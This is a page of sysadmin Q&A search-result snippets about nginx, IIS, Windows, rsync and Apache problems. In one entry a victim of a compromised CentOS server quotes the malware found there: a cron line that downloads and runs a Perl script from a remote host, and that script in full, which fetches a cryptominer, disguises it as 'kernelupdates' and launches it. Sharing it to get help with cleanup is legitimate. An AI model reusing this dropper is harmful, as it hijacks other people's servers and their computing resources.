Search Results

Search found 58272 results on 2331 pages for 'apache log files'.

Page 227/2331 | < Previous Page | 223 224 225 226 227 228 229 230 231 232 233 234  | Next Page >

  • nginx not serving admin static files?

    - by toto_tico
    First, I want to clarify that this error is just for the admin static files. This means my problem is specific just to the static files that corresponds to the Django admin. The rest of the static files are working perfect. Basically my problem is that for some reason I cannot access those admin static files with the ngix server. It works perfect with the micro server of Django and the collect static is doing its job. This means it is putting the files on the expected place in the static folder. The urls are correct but I cannot even access the admin static files directly, but the others I can. So, for example, I am able to access this url (copying it in the browser): myserver.com:8080/static/css/base/base.css but i am not able to access this other url (copying it in the browser): myserver.com:8080/static/admin/css/admin.css I also tried to copy the admin/ directory structure into other_admin_directory_name/. Then I can access myserver.com:8080/static/other_admin_directory_name/css/admin.css Then, it works. So, I checked permissions and everything is fine. I tried to change ADMIN_MEDIA_PREFIX = '/static/admin/' to ADMIN_MEDIA_PREFIX = '/static/other_admin_directory_name/', it doesn't work. This a mistery in itself that I am exploring but still no luck. Finally, and it seems to be an important clue: I tried to copy the admin/ directory structure into admin_and_then_any_suffix/. Then I cannot access myserver.com:8080/static/admin_and_then_any_suffix//css/admin.css So, if the name of the directory starts with admin (for example administration or admin2) it doesn't work. * added thanks to sarnold observation ** the problem seems to be in the nginx configuration file /etc/nginx/sites-available/mysite location /static/admin { alias /home/vl3/.virtualenvs/vl3/lib/python2.7/site-packages/django/contrib/admin/media/; }

    Read the article

  • System32 files can be deleted in Windows 2008 but not in Windows 2003 [closed]

    - by Harvey Kwok
    I have been using Windows 2003 for a long time. There is a wonderful feature. I don't know the name of it but the feature is like this. You can rename or delete some important files inside C:\windows\system32. e.g. kerberos.dll. After a while, the deleted files will be automatically recovered. I think this is because those files are criticl enough that Windows cannot survive without them. However, in Windows 2008, this feature is gone. Instead, all the files in System32 are owned by TrustedInstaller. However, as a administrator, I can still take the ownserhip of the files and then delete them. Windwos 2008 won't recover the deleted files and hence the system is screwed next time it's reboot. So, I wonder why Windows 2008 dropping that wonderful feature. Was that auto-recovery feature also suffer from some issues? Does Windows 2008 have some other features that can prevent this type of disaster from happening?

    Read the article

  • Shared files folder in Amazon Elastic Beanstalk environment

    - by por
    I'm working on a Drupal application, which is planned to be hosted in Amazon Elastic Beanstalk environment. Basically, Elastic Beanstalk enables the application to scale automatically by starting additional web server instances based on predefined rules. The shared database is running on an Amazon RDS instance, which all instances can access properly. The problem is the shared files folder (sites/default/files). We're using git as SCM, and with it we're able to deploy new versions by executing $ git aws.push. In the background Elastic Beanstalk automatically deletes ($ rm -rf) the current codebase from all servers running in the environment, and deploys the new version. The plan was to use S3 (s3fs) for shared files in the staging environment, and NFS in the production environment. We've managed to set up the environment to the extent where the shared files folder is mounted after a reboot properly. But... The Problem is that, in this setup, the deployment of new versions on running instances fail because $ rm -rf can't remove the mounted directory, and as result, the entire environment goes down and we need restart the environment, which isn't really an elegant solution. Question #1 is that what would be the proper way to manage shared files in this kind of deployment? Are you running such an environment? How did you solve the problem? By looking at Elastic Beanstalk Hostmanager code (Ruby) there seems be a way to hook our functionality (unmount if mounted in pre-deploy and mount in post-deploy) into Hostmanager (/opt/hostmanager/srv/lib/elasticbeanstalk/hostmanager/applications/phpapplication.rb) but the scripts defined in the file (i.e. /tmp/php_post_deploy_app.sh) don't seem to be working. That might be because our Ruby skills are non-existent. Question #2 is that did you manage to hook your functionality in Hostmanager in a portable way (i.e. by not changing the core Hostmanager files)?

    Read the article

  • Excel fails to open Python-generated CSV files

    - by johnjdc
    I have many Python scripts that output CSV files. It is occasionally convenient to open these files in Excel. After installing OS X Mavericks, Excel no longer opens these files properly: Excel doesn't parse the files and it duplicates the rows of the file until it runs out of memory. Specifically, when Excel attempts to open the file, a prompt appears that reads: "File not loaded completely." Example of code I'm using to generate the CSV files: import csv with open('csv_test.csv', 'wb') as f: writer = csv.writer(f) writer.writerow([1,2,3]) writer.writerow([4,5,6]) Even the simple file generated by the above code fails to load properly in Excel. However, if I open the CSV file in a text editor and copy/paste the text into Excel, parse it with text to columns, and then save as CSV from Excel, then I can reopen the CSV file in Excel without issue. Do I need to pass an additional parameter in my scripts to make Excel parse the CSV files the same way it used to? Or is there some setting I can change in OS X Mavericks or Excel? Thanks.

    Read the article

  • IIS6 Sending a 404 for ".exe" files.

    - by Tracker1
    Recently a bunch of files I had setup for download via IIS6's web server stopped working. They are a number of setup files ending in ".exe" and were working prior to a few months ago. I have the file permissions set properly, and even enabled browsing in IIS to determine that the paths are indeed correct. I'm not sure if it is related, but the directories with a period stopped working as well. ex: "~/download/ApplicationName/0.9/AppName-setup-0.9.123b2.exe" When I rename the directory to say 0_9 the browsing works, but the file itself delivers a 404 message from IIS. For now, I've setup FileZilla FTP for anonymous access to these files, but would prefer to continue using IIS. I've considered creating an HTTP handler to serve the .exe files, but would really prefer a configuration solution. I just can't figure out why it isn't working, as all the settings are correct. Directory is setup for read access. "Everyone" has read permissions on the files themselves, and the directory browsing (aside from the folder "0.9" to "0_9" rename) shows the files.

    Read the article

  • Copy files from sub directories into one directory.

    - by Derek Organ
    Ok I have a bunch of files in this file structure format. /backup/daily/database1/database1-2011-01-01.sql /backup/daily/database1/database1-2011-01-02.sql /backup/daily/database1/database1-2011-01-03.sql /backup/daily/database1/database1-2011-01-04.sql /backup/daily/database1/database1-2011-01-05.sql /backup/daily/database1/database1-2011-01-06.sql /backup/daily/database1/database1-2011-01-07.sql /backup/daily/anotherdb/anotherdb-2011-01-01.sql /backup/daily/anotherdb/anotherdb-2011-01-02.sql /backup/daily/anotherdb/anotherdb-2011-01-03.sql /backup/daily/anotherdb/anotherdb-2011-01-04.sql /backup/daily/anotherdb/anotherdb-2011-01-05.sql /backup/daily/anotherdb/anotherdb-2011-01-06.sql /backup/daily/anotherdb/anotherdb-2011-01-07.sql /backup/daily/stuff/stuff-2011-01-01.sql /backup/daily/stuff/stuff-2011-01-02.sql /backup/daily/stuff/stuff-2011-01-03.sql /backup/daily/stuff/stuff-2011-01-04.sql /backup/daily/stuff/stuff-2011-01-05.sql /backup/daily/stuff/stuff-2011-01-06.sql /backup/daily/stuff/stuff-2011-01-07.sql And there are lots lots more. ultimately I want to import all the 2011-01-07.sql files into my mysql database. This works for one mysql -u root -ppassword < /backup/daily/database1/database1-2011-01-07.sql That will nicely restore that database from this backupfile. I want to run a process where it does this for all databases. So my plan is to first cp all 2011-01-07 sql files into a tmp dir e.g. cp /backup/daily/*/*2011-01-07*.sql /tmp/all The command above unfortunately isn't working I get an error: cp: cannot stat ..... No such file or directory So can you guys help me out with this. For bonus points if you can tell me how to do the next step which is import all databases in one command doing one at a time that would be great too. I really want to do these in two separate steps because I need to delete a few sql files manually from the tmp dir before I run the restore command. So I need: 1) command to copy all 2011-01-07 sql files to a tmp dir 2) command to import all those files in that dir into mysql I know its possible to do in one but for lots of reasons I really would prefer to do it in two steps.

    Read the article

  • Filesystem fragmentation on the level of set of files

    - by trismarck
    The file is stored in blocks by the file system. The block is the smallest amount of data the file system can assign to store a file. The classical definition of a fragmented file is that the file is stored in blocks that are 'scattered' (that are physically non-contiguous) around the hard drive. What I want to ask about is this second type of fragmentation I've came up with. Lets suppose we install a program. This program has very many files. When the program starts, the program always loads the contents of those files sequentially. Now, even if the hard disk is defragmented, there is still a possibility that the files (but not the blocks building up to files) will be scattered on the disk and thus the program launch time will be longer. Actually, this time could be longer due to defragmentation of the disk, as the defragmentation process not only glues fragmented files but also moves some files to optimize free space chunks. The questions: is the type of fragmentation I mentioned relevant for the file system? is it possible to remedy this kind of fragmentation and if yes, how would you do it? Also, I'm not sure if this question should belong to superuser or to serverfault (as I guess the filesystem fragmentation is more important in the server environment).

    Read the article

  • How can I batch convert SVG files containing text to PDF files (specifically on CentOS 5.3 x86_64)?

    - by molecules
    I would like to programatically convert SVG files to PDF files. However, the SVG files contain text that must be searchable in the generated PDF files. Also, it has to work on Red Hat Enterprise Linux 5.3 or CentOS 5.3 for the x86_64 architecture. It would be nice if it were Open Source or at least not very expensive. Here is what I've tried. All of these, except Batik, work fine on Debian Lenny. Inkscape I can get it installed using autopackages from http://inkscape.modevia.com/ap, but when I use it from the command line, the text is not searchable. Batik rasterizer [sic] When it converts SVG files to PDF files, the text is no longer searchable. svg2pdf The source for this and several of its dependencies are available to download. I have been trying to get it to compile on CentOS, but haven't had success yet. I found a precompiled version for Debian x86_64, but it doesn't work on CentOS. rsvg-convert Generated PDF isn't searchable on CentOS 5.3. Perhaps installing a newer version of cairo would help. Thanks to DaveParillo for mentioning rsvg-convert (on superuser). SOLUTION (but perhaps some of the above will still be useful to the reader) princeXML It works fine on CentOS when installed from source. For some reason it doesn't work when installed from the .rpm. Thanks Erik Dahlström! (provided solution that worked for my case on stackoverflow) Cross posted on stackoverflow

    Read the article

  • How to move or delete files from a folder containing 2 million files on an NTFS drive?

    - by Beau
    The issue is that any modification to the directory locks up Explorer indefinitely, though Samba access to other directories still works. I've tried moving files locally and over Samba. Even enumerating the directory to get the list of files locks up the computer indefinitely. I tried using Python's win32file.FindFilesIterator to iterate the files but that also hangs. My idea was to move each file to a different directory (in a directory above the directory we're dealing with) based on its timestamp, so that we'd have at most a thousand or so files in each directory... But since I can't even enumerate the files, that's been a non-starter. If I have to give up and just nuke the directory I'm willing to do that, but a standard delete also hangs indefinitely. I have set these two parameters to increase speed and they also did not help the issue: R:\>fsutil behavior query disablelastaccess disablelastaccess = 1 R:\>fsutil behavior query disable8dot3 disable8dot3 = 1 These are all sequential images that would have run into the 'bug' with 8.3 filenames whereby many similarly named files in one directory can take a long time to compute 8.3 filenames. From what I understand this data is stored in the file system even after disable8dot3 is enabled, so it may still be contributing to the problem. Any ideas?

    Read the article

  • Windows 8 Pro Homegroup Not Allowing Access to Shared Files

    - by Jack Herr
    I have two pc's and a laptop. With all three running Windows 7, homegroup worked perfectly, with all computers able to access the files on the others exactly as one would expect. I installed Windows 8 Pro, which I downloaded recently from the MSDN website, on the laptop. From the info on the MSDN website, I believe the version downloaded is the official release version, not a release candidate. The install preserved all settings, apps, and files. I cannot connect to the homegroup from the laptop. Well, not exactly. I joined the homegroup during the install, and later left and rejoined, that was advertised as being offered by one of the pc's (not sure why that one was picked and not the other or both). This homegroup appears in my "computer" folder in the file explorer, offering files from that pc. But it excludes documents (only the music, pix, videos, and playlists folders on the one computer appear). I can actually access those files from the laptop. But the Homegroup folder, which actually shows all the computers by account and computer name and includes documents from both computers, does not open those folders when clicked. The computers listed by name in the Network folder give me a login that doesn't work. It asks for a username and password, no combinations of which work. Further, the following error message appears before the login is even attempted: "The system cannot contact a domain controller to service the authentication request. Please try again later." The two windows 7 pc's continue to share all files, including documents, seemlessly. I can also get to the laptop shared files, which I shared during setup, from either pc. Any ideas?

    Read the article

  • How to remove NTFS system files from a previous Vista installation

    - by Boldewyn
    I'm trying to shrink my system partition under Win Vista. It's all fine, except that in front of the last 300MB of the volume sits a single file, that cannot be moved by defrag or other means from its position. It's called C:\$Extend\$UsnJrnl:$J, and my assumtion is, that it is left from a previous installation of Vista, when I re-set up the system. Now, googling for this kind of files brings interesting results, but no solution to my problem: Files left on the disk can become ownerless in a new setup of Windows and inaccessible (even for administrators). To be able to access them again, I found the tip to use takeown to re-assign them to the Admin group (or anyone else). Works like a charm for normal files, but not for the C:\$Extend stuff. The C:\$Extend folder is a system folder of the NTFS file system, where the journal is stored (especially in a file called $UsnJrnl:$Data, whose name is surprisingly close to mine). You can delete the journal with fsutil usn /delete C:, however, this doesn't work from within the booted system (as I found out trying). Also, I'm not quite sure of the side effects. You can't move the NTFS own files with standard defrag tools. The same holds, by the way, for not accessible files. Every bit of knowledge out there is targeted to either not accessible files or the $Extend NTFS stuff, but noone addresses my problem involving both, an inaccessible system file. Question: How can I remove this file, or at least how can I move it on the disk?

    Read the article

  • Apache permission Problems

    - by swg1cor14
    Ok all my files and folders are set as owner of vsftpd:nogroup. FTP program can upload and create and do everything. But when I use the PHP command mkdir, I get a Permission Denied even though the folder its creating it in is set to chmod 777. IF i set the base folder to user www-data and group www-data, PHP mkdir will work. However, I can't use FTP to delete or upload to that folder. /uploads is base folder. I use PHP mkdir to create a directory in there: if (!is_dir($_SERVER['DOCUMENT_ROOT'] . "/uploads/" . $_REQUEST['clientID'] . '/video/')) { @mkdir($_SERVER['DOCUMENT_ROOT'] . "/uploads/" . $_REQUEST['clientID'] . '/video/', 0777); } If /uploads is vsftpd:nogroup then PHP mkdir will give a Permission Denied error. If /uploads is www-data:www-data then PHP mkdir WILL work, but I cant continue to FTP anything in that folder that was just created. If /uploads is vsftpd:www-data then PHP mkdir will give a Permission Denied error. How can I create a directory with PHP and still be able to access it via FTP?

    Read the article

  • Backup files from Linux client to Windows Server

    - by Andrew
    I'm trying to backup my files from my Linux box to my Windows Server 2008 as a push, and when I delete them from my Linux box, they remain on my Windows Server. I've found lots of sources that are similar, but most results were from Windows to Linux. I managed to find slightly more similar cases like Using rsync and cygwin to Sync Files from a Linux Server to a Windows Notebook PC, and rsync from Windows PC to remote Linux server, with the most similar being a backup from Linux to Windows Server, but through a pull from the Windows Server. Initially, I used Unison because I thought having the 2-way capability would come in handy, and I would just have to set some configurations to make it 1-way. Unfortunately, I couldn't find the right configuration, and only managed to synchronize using the command unison "profile" -ui text -auto -silent. When I deleted the files on my Linux box, the files in the Server got deleted too, which of course, isn't what I want. When I tried to find any options for Unison, I only discovered the -force option, which didn't help, since what I wanted was an incremental update to the Server. I found out I could achieve this from using rsync and the -a option (archive), which would keep adding files even if I deleted them from my Linux box. I installed Cygwin on my Windows Server, configured an SSH daemon, but I can't seem to get it working. I've also already configured Windows Firewall to open port 22 (both inbound and outbound). I used the following command from my Linux box: rsync -avrzn /folder/to/be/backed/up/ [email protected]:/cygdrive/c/place/to/store/backed/up/files (a - archive, v - verbose, r - recurse into subdirectories, z - compress, n - dryrun) but it just won't work. Can anyone help me out? I don't mind using either Unison or rsync, as long as it achieves what I want.

    Read the article

  • Methods to transfer files from Windows server to linux server

    - by Raze2dust
    Hi, I need to transfer webserver-log-like-files containing periodically from windows production servers in the US to linux servers here in India. The files are ~4 MB in size each and I get about 1 file per minute. I can take about 5 mins lag between the files getting written in windows and them being available in the linux machines. I am a bit confused between the various options here as I am quite inexperienced in such design: I am thinking of writing a service in C#.NET which will periodically archive, compress and send them over to the linux machines. These files are pretty compressible. WinRAR can convert 32 MB of these files into a 1.2 MB archive. So that should solve the network transfer speed issue. But then how exactly do I transfer files to linux? I could mount linux drive on windows server using samba, or should I create an ftp server, or send the file serialized as a POST request. Which one would be good? Also, I have to minimize the load on the windows server. Mount the windows drive on linux instead. I could use the mount command or I could use samba here (What are the pros and cons of these two?). I can then write the compressing and copying part in linux itself. I don't trust the internet connection to be very stable, so there should be a good retry mechanism and failure protection too. What are the potential gotchas in these situations, and other points that I must be worried about? Thanks, Hari

    Read the article

  • OPTIONS * HTTP/1.0 APACHE

    - by Abby E
    I been noticing a lot lately in my /server-status the OPTIONS * HTTP/1.0 has been coming up lately a lot. I'm running Ubuntu 12.04 with the latest apache/php/MySQL. I'm not sure what they're for but I would like to see if it would effect performance by some how turning it off. I host some stuff that is accessed a lot that uses PHP/MySQL (600 rps). I'm not sure what it's there for but I do see the local 127.0.0.1 IP, so I assume it's something running local. What is it? How do your turn it off? If turned off how would it effect performance? The list below is a small example of it. (127.0.0.1 REMOVED.(null) hostname has been removed) 211-0 - 0/0/1035 . 24.28 240189 0 0.0 0.00 0.18 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 212-0 - 0/0/51274 . 677.97 202960 0 0.0 0.00 8.99 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 213-0 - 0/0/419 . 11.85 240424 0 0.0 0.00 0.07 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 214-0 - 0/0/240 . 7.96 240552 0 0.0 0.00 0.04 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 215-0 - 0/0/309 . 9.29 240492 0 0.0 0.00 0.05 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 216-0 - 0/0/98510 . 1258.25 177391 0 0.0 0.00 17.29 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 217-0 - 0/0/338 . 10.18 240464 0 0.0 0.00 0.06 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 218-0 - 0/0/345 . 10.27 240469 0 0.0 0.00 0.06 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 219-0 - 0/0/118538 . 1507.99 168914 0 0.0 0.00 20.80 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 220-0 - 0/0/98452 . 1259.10 177412 0 0.0 0.00 17.29 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 221-0 - 0/0/384 . 10.84 240453 0 0.0 0.00 0.06 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 222-0 - 0/0/331 . 10.03 240477 0 0.0 0.00 0.06 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 223-0 - 0/0/314 . 9.04 240493 0 0.0 0.00 0.05 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 224-0 - 0/0/75193 . 975.24 188845 0 0.0 0.00 13.18 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 225-0 - 0/0/362 . 10.62 240457 0 0.0 0.00 0.06 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 226-0 - 0/0/125773 . 1593.26 165647 0 0.0 0.00 22.06 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 227-0 - 0/0/82541 . 1063.89 185092 0 0.0 0.00 14.48 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 228-0 - 0/0/409 . 11.50 240436 0 0.0 0.00 0.07 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 229-0 - 0/0/219 . 7.38 240581 0 0.0 0.00 0.04 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 230-0 - 0/0/357 . 10.48 240458 0 0.0 0.00 0.06 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 231-0 - 0/0/469 . 12.39 240411 0 0.0 0.00 0.08 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 232-0 - 0/0/394 . 11.32 240445 0 0.0 0.00 0.07 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 233-0 - 0/0/276 . 9.00 240510 0 0.0 0.00 0.05 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 234-0 - 0/0/245 . 8.51 240536 0 0.0 0.00 0.04 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 235-0 - 0/0/215 . 7.45 240555 0 0.0 0.00 0.04 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 236-0 - 0/0/370 . 11.00 240443 0 0.0 0.00 0.06 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 237-0 - 0/0/400 . 10.96 240446 0 0.0 0.00 0.07 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 238-0 - 0/0/266 . 8.51 240531 0 0.0 0.00 0.04 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 239-0 - 0/0/304 . 9.81 240499 0 0.0 0.00 0.05 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 240-0 - 0/0/446 . 12.47 240421 0 0.0 0.00 0.08 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 241-0 - 0/0/19741 . 282.90 230130 0 0.0 0.00 3.45 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 242-0 - 0/0/98503 . 1259.43 177404 0 0.0 0.00 17.28 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 243-0 - 0/0/251 . 7.93 240551 0 0.0 0.00 0.04 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 244-0 - 0/0/273 . 8.42 240534 0 0.0 0.00 0.05 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 245-0 - 0/0/118485 . 1508.14 168950 0 0.0 0.00 20.79 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 246-0 - 0/0/294 . 9.35 240509 0 0.0 0.00 0.05 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 247-0 - 0/0/413 . 12.34 240437 0 0.0 0.00 0.07 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 248-0 - 0/0/258 . 8.55 240529 0 0.0 0.00 0.04 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0 249-0 - 0/0/303 . 9.77 240485 0 0.0 0.00 0.05 127.0.0.1 REMOVED.(null) OPTIONS * HTTP/1.0

    Read the article

  • program to track recent saved files or downloads?

    - by DiegoDD
    Back to windows XP times, i used a program named Ava Find that can find any file in the system, but a really nice feature it had, called "scout bot" that automatically finds new files, that is, recently created. More info here: AvaFind For example, if i saved or downloaded a file (in any program), but i cant remember its name or where i put it, i just simply looked at the scoutbot list, and it showed me the most recent files, and then i could just open them from there, or jump to their path. Since i changed to windows 7 (passing through vista), the program no longer works. It simply keeps indexing forever and never finds anything. I don't know if it is not compatible with win 7 itself, or because the fact that my windows 7 is 64 bit. I already tried to contact the Avafind creators, but they never answered, and the program seems to be no longer supported (although the site still works). Now, is there a similar program that finds RECENT files? e.g. listing the most recently saved files, system-wide (or even limiting it to some folders, discs)? And that of course, that is confirmed to work with win 7 64 bit. I know that there are many programs that can find any file, like everything, but what i want is to find recent files and their paths, without knowing their name or e. "everything" also can sort results by date, which is almost what i need, simply to look for part of the file name or extension, and get the most recent one. but if i get to many results, it takes a while, plus, i STILL need to know the name or at least extension of the file. What i want is simply a "Most recently Saved files" tool. i.e., a replacement for Scout Bot in Ava Find. Do you know any alternative?

    Read the article

  • Scheduled Task unable to create/update any files

    - by East of Nowhere
    I have several tasks in Task Scheduler in Windows Server 2008 SP2 (32-bit) and they all successfully "do their work", except for creating or updating any files on Windows. All the tasks point to simple .cmd files that have the real work but beyond that there's no pattern: some call robocopy with the /LOG option, some call .exe files I wrote that manipulate XML files, some just do stuff with > redirection. With all of them, if I double-click the .cmd file myself, it works fine and the files are created or updated or whatever. If I run it from Task Scheduler (by the schedule or just clicking Run), the task always completes "successfully" but without any of the desired changes to files. I don't see any "unable to create file" errors in Event Viewer either. The tasks do all Run As a specific account, but I have logged in as that account and verified that it has permissions to do everything it needs to. Further details -- Task is set to Run whether user is logged in or not. Configured for: "Windows Vista or Windows Server 2008", there is no other Configured for option available.

    Read the article

  • Safe to remove Python2.6 files?

    - by darkfeline
    I'm using Linux Mint 11 (will upgrade soon), and I've noticed that, even though I don't have any python2.6 packages installed with apt, there's a bunch of residual python2.6 files scattered around my drive, including, but not limited to, dist-packages in /usr/lib/python2.6 and various /usr/share stuff. Is there any way to test if these files are still being used? I'm tempted to sudo rm -rf the lot of them, but I'm scared it'll break stuff. Also, does anyone have any idea where these files could have come from? I believe I had python2.6 installed once upon a time, but I made sure to --purge them, so there shouldn't be any trace of them left, right? EDIT: after using a quick script to check all of the files, it appears most of them belong to important packages, so I won't try weeding out the few which I know are probably useless. Although I am curious why so many packages have python2.6 files when I don't even have it installed. These files are not associated with any packages and I'm not sure if they are safe to remove: /usr/bin/ipython2.6 /usr/lib/python2.6/dist-packages/distribute-0.6.15.egg-info /usr/lib/python2.6/dist-packages/easy_install.py /usr/lib/python2.6/dist-packages/IPython /usr/lib/python2.6/dist-packages/ipython-0.10.1.egg-info /usr/lib/python2.6/dist-packages/setuptools /usr/lib/python2.6/dist-packages/setuptools.egg-info /usr/lib/python2.6/dist-packages/setuptools.pth /usr/lib/python2.6/dist-packages/site.py /usr/lib/python2.6/dist-packages/wx.pth /usr/local/lib/python2.6 /usr/local/lib/python2.6/dist-packages /usr/local/lib/python2.6/site-packages /usr/share/man/man1/ipython2.6.1.gz

    Read the article

  • Where should I go with hosting my site: VPS, GAE, another option?

    - by Jonathan Hayward
    My website, http://JonathansCorner.com/, began life before 1994 as www.imsa.edu/~jhayward/ and has been through various iterations and improvements to content, HTML, and the like, but remains a literature site that is from a web administrator's perspective fairly simple and primitive: a fair amount of static HTML and supporting files, a little bit of CGI and URI rewriting, .htaccess files providing Expires: headers and the like. An associated site demoes various CGI scripts that fall under the category of "and other creations"; the site as a whole has the purpose of sharing my creative works, and so far a fairly rudimentary use of Apache functionality, supported by Unix tools to, for instance, update RSS feed and the "starting point" link on the home page, has served that purpose fairly well. I looked around here on web hosting, and found the note on web host reccommendations as a good note for "What are some of people's favorite web hosts overall," but I wanted to ask a more focused question of "What are the best web hosts for criteria XYZ:" I am looking at a VPS so I will have root, be able to install stuff and edit Apache's config files etc., running Gentoo or other Linux, BSD, or the like. I would like a system that is secure enough that the host's vulnerabilities are mostly the ones that come along with what I am trying to do: that is, I won't be trying to administer and secure an ancient Linux like some have complained about at 1and1. I would like good uptime/reliability and competent support staff: if the level 1 help desk is going to tell me to go to "My Computer" on a Linux box, I'd like to be able to get past them. Ideally I would like a site hosted within some place that will have low latency for U.S. visitors in particular. I would like a hosting solution that will be with a stable business, one that will probably be around, and one unlikely to vanish without warning. With those things specified, I would be interested in knowing what are the less expensive options. (I expect that some of the things I've specified will knock out all of the cheapest options, but I'm still interested in price.) With all that stated, I'd like to back up a bit and look at whether I am asking the right question. I am concerned that the above is a very good way of asking, "How can I keep my site in line with the wave of the past?" I am wondering if it might be specifically wiser to look to adapt my site to newer technologies instead of trying to keep it on older technologies. For instance, while I would hardly portray my site as a way to show off the full power of Google App Engine, the main site at least should be a straightforward port if I were to do that. And beyond Google App Engine, my knowledge of cloud solutions is basic. If it is a better and more future-proof solution to port my site to another kind of solution, I would be interested in knowing where those future-proof solutions lie. So I would be interested in wisdom. If the question I asked in detail is still a good question to be asking, what would people suggest? Or if I should seriously consider porting my site to a newer basic option, what should I try there? Any thoughts would be appreciated.

    Read the article

  • ./kernelupdates 100% cpu usage

    - by Vaibhav Panmand
    I have a CENTOS6 server running with some wordpress & tomcat websites. In the last two days it has been crashing continuously. After investigation we found that kernelupdates binary consuming 100% cpu on server. Process is mentioned below. ./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.9 -p passxxx But this process seems invalid kernel update. Might be server is compromised and this process is installed by hacker, So I've killed this process & removed apache user's cron entries. But somehow this process started again after couple of hours & cron entries also restored, I am searching for the thing which is modifying cron jobs. Does this process belong to a mining process? How can we stop cronjob modification and clean the source of this process? Cron entry (apache user) /6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc* abc.txt #!/usr/bin/perl system("killall -9 minerd"); system("killall -9 PWNEDa"); system("killall -9 PWNEDb"); system("killall -9 PWNEDc"); system("killall -9 PWNEDd"); system("killall -9 PWNEDe"); system("killall -9 PWNEDg"); system("killall -9 PWNEDm"); system("killall -9 minerd64"); system("killall -9 minerd32"); system("killall -9 named"); $rn=1; $ar=`uname -m`; while($rn==1 || $rn==0) { $rn=int(rand(11)); } $exists=`ls /tmp/.ice-unix`; $cratch=`ps aux | grep -v grep | grep kernelupdates`; if($cratch=~/kernelupdates/gi) { die; } if($exists!~/minerd/gi && $exists!~/kernelupdates/gi) { $wig=`wget --version | grep GNU`; if(length($wig>6)) { if($ar=~/64/g) { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } else { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } } else { if($ar=~/64/g) { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } else { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } } } @prts=('8332','9091','1121','7332','6332','1332','9333','2961','8382','8332','9091','1121','7332','6332','1332','9333','2961','8382'); $prt=0; while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; } print "setup for $rn:$prt done :-)\n"; system("cd /tmp/.ice-unix;./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &"); print "done!\n"; Thanks in advance!

    Read the article

  • Windows 7 disk errors after a few hours of runtime

    - by GFK
    I'm having trouble understanding what is going on with my work PC. Whenever I boot it, it runs fine for a while, then starts to randomly show disk errors. The displayed error often contains the message "not enough storage is available to process this command", although depending on the application that fails it can be different. This has happened for weeks now and is getting worse. This is what troubles me: It never seems to impact critical parts of the system (no BSOD, no freeze). Only some applications seem impacted, refusing to function correctly after a while: Outlook 2010 cannot download RSS feeds anymore, Firefox 6 or IE9 cannot download anything bigger than 3MB without failing, Windows Update fails, all msi installers fail, Visual Studio 2010 starts failing in weird manners... It only happens after a while using it (typically 3 hours, but it seems that installing a program or compiling several times makes it shorter) Rebooting solves it (temporarily). The system: The OS is Windows 7 Pro Spanish SP1, 32 bits The system is an HP Compaq 6000 Pro with 4 GB memory (only 3.4GB usable since the system is 32bit), one 500GB hard drive. Installed applications include: Visual Studio 2010, SQL Server 2008 R2, VMWare Workstation 7, Microsoft Security Essentials, Office 2010. Shutting down all related services and processes doesn't seem to change anything. The diagnostics I've run so far: Hard drive : 465GB, 165GB free Process Explorer : physical and virtual memory seem ok (pagefile is 5.3GB, physical memory usage 70%, system commit 39%) Windows 